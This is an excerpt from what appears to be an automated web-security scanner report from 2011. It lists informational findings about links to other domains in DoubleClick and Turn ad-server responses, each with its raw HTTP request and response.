http://dar.youknowbest.com/?afid=1146&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b09/f/1fb/%2a/k%3B240976916%3B0-0%3B0%3B63331234%3B3454-728/90%3B42048533/42066320/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/tpclick/id/57ha2ZqW6W5ZugEAbQABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/&AD_CALL_ID=7992084605561387239&AD_ID=26005388&BEHAVIOR_SIGNAL_ID=319697420&CHANNEL_ID=11185948&LINE_ITEM_ID=184588126&PUBLISHER_ID=11185880&SITE_ID=13906109?&DFA_BuyId=5478635&DFA_PlacementId=63331234&DFA_AdId=240976916&DFA_CreativeId=42048533&DFA_SiteId=830226

Request

GET /adi/N5823.DbclkAdEx/B5478635.45;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109?;click=http://r.turn.com/r/tpclick/id/57ha2ZqW6W5ZugEAbQABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9942530385485090&output=html&h=90&slotname=7409232867&w=728&lmt=1305527557&flash=10.3.181&url=http%3A%2F%2Fsecureshopping.mcafee.com%2F&dt=1305509556443&bpp=3&shv=r20110509&jsv=r20110506&correlator=1305509557695&frm=0&adk=2067801485&ga_vid=934359654.1305509558&ga_sid=1305509558&ga_hid=579067022&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=1275&xpc=N75PYouOId&p=http%3A//secureshopping.mcafee.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1281
Date: Mon, 16 May 2011 01:41:13 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><iframe width="728px" height="90px" marginHeight="0" src="http://dar.youknowbest.com/?afid=1146&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b09/f/1fb/%2a/k%3B240976916%3B0-0%3B0%3B63331234%3B3454-728/90%3B42048533/42066320/1%3B%3B%7Esscs%3D%3fhttp://r.turn.com/r/tpclick/id/57ha2ZqW6W5ZugEAbQABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/&AD_CALL_ID=7992084605561387239&AD_ID=26005388&BEHAVIOR_SIGNAL_ID=319697420&CHANNEL_ID=11185948&LINE_ITEM_ID=184588126&PUBLISHER_ID=11185880&SITE_ID=13906109?&DFA_BuyId=5478635&DFA_PlacementId=63331234&DFA_AdId=240976916&DFA_CreativeId=42048533&DFA_SiteId=830226" frameBorder="0" allowTransparency="allowtransparency" marginWidth="0" scrolling="no" leftmargin="0" topmargin="0"></iframe>
...[SNIP]...

22.7. http://ad.doubleclick.net/adi/ta.cc.com.s/deals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/ta.cc.com.s/deals

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/ta.cc.com.s/deals;pos=right2;sz=160x600;region=;city=;cruiseline=;style=;pagetype=;tile=13;ord=051511092806?

The response contains the following link to another domain:

http://s0.2mdn.net/2413483/TOP10-new-160x600.gif

Request

GET /adi/ta.cc.com.s/deals;pos=right2;sz=160x600;region=;city=;cruiseline=;style=;pagetype=;tile=13;ord=051511092806? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cruisecritic.com/bargains/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 845
Date: Mon, 16 May 2011 01:28:13 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 8363 Template Name = TA - Marketing - Gif/J
...[SNIP]...
h%3Dv8/3b09/3/0/%2a/o%3B233548532%3B1-0%3B0%3B31122603%3B2321-160/600%3B40089374/40107161/1%3B%3B%7Eaopt%3D2/1/8ab8/0%3B%7Esscs%3D%3fhttp://www.tripadvisor.com/InfoCenter-a_ctr.pools" target="_blank">
<img src="http://s0.2mdn.net/2413483/TOP10-new-160x600.gif"img width="160" height="600" border="0"></a>
...[SNIP]...

22.8. http://ad.doubleclick.net/adi/ta.cc.com.s/deals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/ta.cc.com.s/deals

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/ta.cc.com.s/deals;pos=topleft;sz=728x90;region=;city=;cruiseline=;style=;pagetype=;tile=1;ord=051511092806?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2198042/317209/101102_CallCenter_728x90_offsite.jpg

Request

GET /adi/ta.cc.com.s/deals;pos=topleft;sz=728x90;region=;city=;cruiseline=;style=;pagetype=;tile=1;ord=051511092806? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cruisecritic.com/bargains/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 569
Date: Mon, 16 May 2011 01:28:08 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...
1085447;0-0;1;31122603;3454-728/90;39299942/39317729/1;;~aopt=2/1/8ab8/0;~sscs=%3fhttp://cruise.expedia.com/Campaign.aspx?name=Cruise-EXP.callcenter&ICMCID=US.OTHER.CRUISECRITIC.DEALSDISPLAYAD.CRUISE"><img src="http://s0.2mdn.net/viewad/2198042/317209/101102_CallCenter_728x90_offsite.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

22.9. http://ad.doubleclick.net/adi/ta.cc.com.s/deals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/ta.cc.com.s/deals

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/ta.cc.com.s/deals;pos=x81;sz=220x90;region=;city=;cruiseline=;style=;pagetype=;tile=2;ord=051511092806?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2212565/CC_UK_NL_Signup_220x90.jpg

Request

GET /adi/ta.cc.com.s/deals;pos=x81;sz=220x90;region=;city=;cruiseline=;style=;pagetype=;tile=2;ord=051511092806? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cruisecritic.com/bargains/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 473
Date: Mon, 16 May 2011 01:34:07 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b09/0/0/%2a/i;228502913;0-0;1;31122603;130-220/90;38189057/38206814/1;;~aopt=2/1/8ab8/0;~sscs=%3fhttp://www.cruisecritic.com/newsletter/"><img src="http://s0.2mdn.net/viewad/2212565/CC_UK_NL_Signup_220x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

22.10. http://ad.doubleclick.net/adi/ta.cc.com.s/disney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/ta.cc.com.s/disney

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=11;ord=051511092018?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/3155318/FY11_DCL_PCS_Puzzle1150pp_160.jpg

Request

GET /adi/ta.cc.com.s/disney;pos=right1;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=11;ord=051511092018? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cruisecritic.com/reviews/cruiseline.cfm?CruiseLineID=16
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 588
Date: Mon, 16 May 2011 01:20:34 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...
60/600;41939757/41957544/1;;~aopt=0/ff/8ab8/ff;~fdr=240652341;0-0;1;56711164;2321-160/600;41980735/41998522/1;;~aopt=2/1/8ab8/0;~sscs=%3fhttp://disneycruise.disney.go.com/cruises-destinations/europe/"><img src="http://s0.2mdn.net/viewad/3155318/FY11_DCL_PCS_Puzzle1150pp_160.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

22.11. http://ad.doubleclick.net/adi/ta.cc.com.s/disney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/ta.cc.com.s/disney

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=13;ord=051511092018?

The response contains the following links to other domains:

http://s0.2mdn.net/2154192/BB.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/ta.cc.com.s/disney;pos=right2;sz=160x600;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=13;ord=051511092018? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cruisecritic.com/reviews/cruiseline.cfm?CruiseLineID=16
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4789
Date: Mon, 16 May 2011 01:20:34 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
%3Bh%3Dv8/3b09/3/0/%2a/d%3B221091654%3B0-0%3B2%3B56711164%3B2321-160/600%3B30654764/30672641/1%3B%3B%7Eaopt%3D2/1/8ab8/0%3B%7Esscs%3D%3fhttp://rd.bookingbuddy.com/?r=bbs_cruisecritic_ros_160600-a_005"><img src="http://s0.2mdn.net/2154192/BB.gif" width="160" height="600" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

22.12. http://ad.doubleclick.net/adi/ta.cc.com.s/disney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/ta.cc.com.s/disney

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=2;ord=051511092018?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2212565/CC_UK_NL_Signup_220x90.jpg

Request

GET /adi/ta.cc.com.s/disney;pos=x81;sz=220x90;region=;city=;cruiseline=disney;style=;pagetype=reviews;tile=2;ord=051511092018? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cruisecritic.com/reviews/cruiseline.cfm?CruiseLineID=16
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 473
Date: Mon, 16 May 2011 01:29:54 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b09/0/0/%2a/x;228502913;0-0;1;56711164;130-220/90;38189057/38206814/1;;~aopt=2/1/8ab8/0;~sscs=%3fhttp://www.cruisecritic.com/newsletter/"><img src="http://s0.2mdn.net/viewad/2212565/CC_UK_NL_Signup_220x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

22.13. http://ad.doubleclick.net/adi/x1.dt/dt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.dt/dt

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/x1.dt/dt;sz=1x1;ord=1289783?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adi/x1.dt/dt;sz=1x1;ord=1289783? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=;u=17918465;ord=6394684?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 371
Date: Mon, 16 May 2011 01:24:40 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b09/0/0/%2a/p;44306;0-0;0;45196477;31-1/1;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

22.14. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/doubledma/ron/ctest

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=;u=17918465;ord=6394684?

The response contains the following link to another domain:

http://s0.2mdn.net/1887566/f100211_728x90_credit.jpg

Request

GET /adi/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=;u=17918465;ord=6394684? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=&_wp=TdB7vAALBFAdsXGfWuQqmDRKTwzPmcAzS1Nc7w&_nv=1&_CDbg=1791737&_eo=747980&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAPlWGwAAAAAApi0RAAAAAAABahEBAAAAANQwEQAAAAAA1TARAAAAAAAx_NxBAAAAAAAA9D8AAAAAAAAAAMxpCwAAAAAAAAAAAAAAAADMaQsAAAAAAAwAAAAAAAAAOEJXbHMxTDdEZ0dLAAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MGsAAAAAAAAAaHR0cDovL3d3dy50ZWxlZ3JhcGguY28udWsvc3BvbnNvcmVkL3RyYXZlbC9kaXNuZXkvODUwOTkzOC9EaXNuZXktQ3J1aXNlLUxpbmUtQS13b3JsZC1vZi1lbnRlcnRhaW5tZW50Lmh0bWwHAAAAAAAAAF5eNzUyMzgDAAAAAAAAADM2OQAAAAAAAAAAAAACAAAAAAAAAEpTAAAAvHvQTQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1173
Date: Mon, 16 May 2011 01:23:57 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 4439 Template Name = Image Banner - Open in
...[SNIP]...
com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static" target="_blank">
<img width="728" height="90" border="0" src="http://s0.2mdn.net/1887566/f100211_728x90_credit.jpg">
</a>
...[SNIP]...

22.15. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?pub=11185880&cch=11185948&code=11186021&l=728x90&aid=26005388&ahcid=1176968&bimpd=vdZkVJM3QxaI71kKLmsceZdJ9RnFRApAjFc4UA5mG135wdUoUiC5Q1HPXXJdmSbXZKPsp9v3PDJq4nug8RlPS8TBeaPUl7h5CbFMTJ3clnW2WwHfZiw5Ubg4AHeRFTeOqtqGkBUZ_niFSfOuLxHOYVCAueWAZTu0lF6s5dyMH0KZxrl8fFT7Zb-t61TjnLRccNlIsr9gAj5uikcAmMDdg6dE1iEB5xrt-7OPIK5R-kmPQnSmAIH4otq9UaLzNaUNKjjF0W52a_vcddgtoYB2koJqQPbg2fxY2ghlkXX7rkP3GbHcWHJECWDh_pSnr8guR6OmA-V7v7IuPvusR1pSU-oeTYzF-2jOW8WSMR0Sv-qQTUeGoA1YBjq4KIcVPzpVJ6XTb-XXauwv8fAsUcwB0bDGBOcxDF2t_Om_Sd5E6qgTATRwncXWhXpsADdzy7mL1_4OegRSAQFuCiaaREoZwrBvz00HpyKHzI3tnCJVYHCRKDpw3P6_Vokh7Wcml2N2oIvSlbN9XKd0jLLt0XzxROEraJvQxqR9-xgRqOyluanGcNnn58DS8r_TsOcdV0kx210k0C5Y4hCWwHITGP6mPNTbcfB2r9AC15SL679eJ0exb5p3kHJSsrGPw6fJ_W7SXLGKd1cbz5CFphcqTn_DY8XIOEE_VmOmyozgoopzImeIjgHkTlWhNjMob0WG4P_drzqs3D5yAyWgrnFqBRVyEMBBOZnjvxqJP_Xrgaah8EA7eJnwrpm54xvQ2eBZXdM0z3pEtsT7J70a3mE-vLqZNQ&acp=TdB-tgAFh0YK7CsSqBshPgJ9iYgmLGiFSFLeKQ&3c=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N5823.DbclkAdEx/B5478635.45;abr=!ie4;abr=!ie5;sz=728x90;ord=7992084605561387239?
http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109?;click=http://r.turn.com/r/tpclick/id/57ha2ZqW6W6WvwMAawABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/;
http://ad.doubleclick.net/adj/N5823.DbclkAdEx/B5478635.45;abr=!ie;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109?;click=http://r.turn.com/r/tpclick/id/57ha2ZqW6W6WvwMAawABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/;

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Wed, 18 May 2011 01:40:38 GMT
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
